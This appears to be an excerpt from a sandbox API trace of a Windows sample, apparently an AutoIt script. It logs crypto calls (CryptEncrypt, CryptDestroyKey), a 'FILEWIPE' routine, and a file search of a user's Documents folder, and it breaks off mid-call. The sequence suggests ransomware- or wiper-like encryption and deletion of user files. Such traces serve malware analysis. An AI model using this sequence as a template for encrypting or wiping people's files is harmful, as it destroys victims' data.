[0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.235] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.236] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.236] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.236] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0035.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0035.237] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.237] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.238] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.238] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.238] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.238] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.238] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.238] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.238] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.238] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.238] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.238] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.239] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.240] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x13eda, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13ee0) returned 1 [0035.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.240] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.240] CharLowerBuffW (in: lpsz="byte[81633]", cchLength=0xb | out: lpsz="byte[81633]") returned 0xb [0035.241] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.243] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.244] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x13eda, dwBufLen=0x13ee0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x13ee0) returned 1 [0035.244] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.245] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.246] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.246] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.247] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.247] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.254] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.254] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.254] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.254] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.254] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.262] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.262] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.262] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.262] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.262] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.262] CryptDestroyKey (hKey=0x7c2280) returned 1 [0035.263] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.263] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.263] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.263] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.263] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.263] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.263] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.263] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.264] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.264] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.264] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.264] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.264] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.264] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.264] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.264] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0035.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.265] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.265] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.265] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.265] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.267] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.268] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.268] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.268] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFindFileData=0x6ae7a0 | out: 